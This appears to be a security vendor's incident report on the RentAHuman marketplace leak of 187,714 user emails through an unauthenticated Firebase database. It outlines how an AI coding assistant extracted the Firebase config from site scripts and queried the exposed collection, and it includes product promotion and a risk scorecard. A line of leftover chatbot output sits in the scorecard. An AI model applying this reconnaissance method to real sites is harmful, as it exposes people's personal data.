RentAHuman Agentic Marketplace Leak Exposes 187K User Emails
Key Takeaways
- 187,714 user email addresses exposed from the RentAHuman platform.
- Misconfigured Firebase database allowed unrestricted public access.
- AI coding assistant reportedly discovered the vulnerability within minutes.
- Exposure included Stripe customer identifiers and internal user IDs.
- Incident highlights security risks in rapidly developed AI agent ecosystems.
Misconfigured Database Exposes User Data on AI Task Platform
In March 2026, researchers discovered that RentAHuman, a marketplace where AI agents hire humans for real-world tasks, exposed a large user dataset due to a misconfigured Firebase database. The vulnerability allowed public access to 187,714 email addresses along with user IDs and payment identifiers. The incident underscores the security risks emerging in AI-driven platforms that combine automation, APIs, and human labor marketplaces.
What We Know
RentAHuman is an emerging platform designed to allow AI agents to outsource physical tasks to human workers. The marketplace launched in early 2026 and quickly attracted significant attention due to its unusual model: AI systems can post tasks that humans complete in the real world. (aiHola)
In March 2026, security researcher Gal Nagli demonstrated that the platform’s backend database was publicly accessible through Google Firebase. According to reports, the database contained 187,714 personal email addresses along with user IDs and Stripe customer identifiers.
The discovery was made during a security test using an AI coding assistant, which scanned the site’s JavaScript files and extracted Firebase configuration data. Once the project identifier was obtained, the researcher accessed Firestore endpoints and found that the /humans collection could be queried without authentication.
The exposed records were accessible via a simple HTTP request and did not require login credentials. The vulnerability was reported publicly after documentation of the discovery timeline was shared on social media.
The RentAHuman team was subsequently alerted to the issue and began remediation steps. However, the exposure demonstrated how rapidly an attacker or automated tool could locate and retrieve sensitive user data.
How the Breach Happened
The breach occurred because of a misconfigured cloud database combined with exposed application configuration files.
RentAHuman used Google Firebase to manage user records and other backend data. While the platform’s application API attempted to limit sensitive information returned to clients, the underlying Firestore database did not enforce proper access rules. As a result, anyone who accessed the database directly could retrieve the full dataset.
The discovery process illustrates how modern AI-assisted security testing can dramatically accelerate vulnerability detection. The researcher instructed an AI coding assistant to analyze the platform, which quickly scanned the website’s JavaScript files, extracted the Firebase configuration, and generated the necessary API requests to probe backend services.
Within minutes, the system discovered the publicly readable database and retrieved records containing user emails and associated identifiers.
Although no advanced exploit was required, the risk was amplified by the platform’s architecture. RentAHuman connects AI agents, human workers, and financial systems through APIs. A single misconfiguration therefore exposed sensitive data across the entire ecosystem.
This combination of rapid AI-driven development and insufficient cloud security configuration created a vulnerability that automated tools could discover almost instantly.
Why It Matters
The RentAHuman incident highlights how AI-enabled marketplaces create new security challenges at the intersection of automation, APIs, and human labor platforms.
First, the exposure involved personal data belonging to tens of thousands of users who registered on the platform to complete tasks for AI agents. Even though the leaked information primarily consisted of email addresses and identifiers, such data can enable phishing campaigns, identity attacks, or account takeover attempts.
Second, the incident demonstrates how AI tools can accelerate both defensive and offensive security workflows. In this case, an AI coding assistant identified the vulnerability in minutes. A malicious actor using similar tools could replicate the discovery process at scale across thousands of startups and AI platforms.
Third, the breach illustrates the risks of rapidly developed AI ecosystems. Many AI platforms are built quickly to experiment with new concepts such as agent-driven marketplaces. Without strong security practices, these systems can expose sensitive data before they undergo rigorous security testing.
Finally, the event raises questions about governance and accountability in AI-mediated marketplaces. Platforms that allow autonomous agents to interact with human workers must ensure that the underlying infrastructure protects both personal data and financial systems.
PointGuard AI Perspective
The RentAHuman breach demonstrates a growing trend: AI-enabled platforms dramatically expand attack surfaces while accelerating the speed at which vulnerabilities can be discovered and exploited.
PointGuard AI addresses these risks by providing security visibility and governance across the entire AI ecosystem.
First, PointGuard continuously discovers AI assets including models, agents, APIs, and MCP infrastructure across enterprise environments. This allows organizations to detect exposed services, misconfigured databases, and shadow AI deployments before attackers discover them.
Second, the platform applies context-aware policy enforcement across AI workflows. By evaluating organizational, behavioral, and situational context, PointGuard can restrict how agents access sensitive resources and data stores. This prevents unauthorized access even when underlying infrastructure contains configuration errors.
Third, PointGuard enables secure-by-design AI development practices. Development teams can manage prompt templates, agent configurations, and integration endpoints within a governed environment that enforces least-privilege access and secrets protection.
Finally, runtime monitoring helps detect anomalous agent behavior such as large-scale data extraction, automated reconnaissance, or unexpected API activity.
As AI agents become more capable and integrated into real-world workflows, organizations must treat AI systems as critical infrastructure. Security strategies must evolve beyond traditional application protection to include AI-native visibility, policy enforcement, and lifecycle governance.
Incident Scorecard Details
Total AISSI Score: 6.3 / 10
Criticality = 6
Exposure of user emails and identifiers from an operational AI marketplace platform.
AISSI weighting: 25%
Propagation = 6
Cloud database misconfiguration could affect similar AI platforms and services using shared development patterns.
AISSI weighting: 20%
Exploitability = 7
Publicly accessible database requiring no authentication; easily discoverable by automated scanning tools.
AISSI weighting: 15%
Supply Chain = 7
Platform relied heavily on third-party cloud infrastructure and integrated services including Firebase and Stripe.
AISSI weighting: 15%
Business Impact = 6
Exposure of user emails and identifiers created phishing and account risk, but no confirmed financial or operational damage reported.
AISSI weighting: 25%
If you'd like, I can also show you one scoring adjustment many security trackers make for incidents like this that would raise the credibility of the score (because analysts often rate Exploitability higher than Criticality for open databases).
Sources
- Blockchain.News report on RentAHuman breach
https://blockchain.news/ainews/rentahuman-data-breach-exposes-187-714-emails-ai-agent-security-analysis-and-2026-lessons - AIhola analysis of exposed Firebase database
https://aihola.com/article/rentahuman-firebase-data-leak - Academic analysis of the RentAHuman AI-agent marketplace
https://arxiv.org/abs/2602.19514
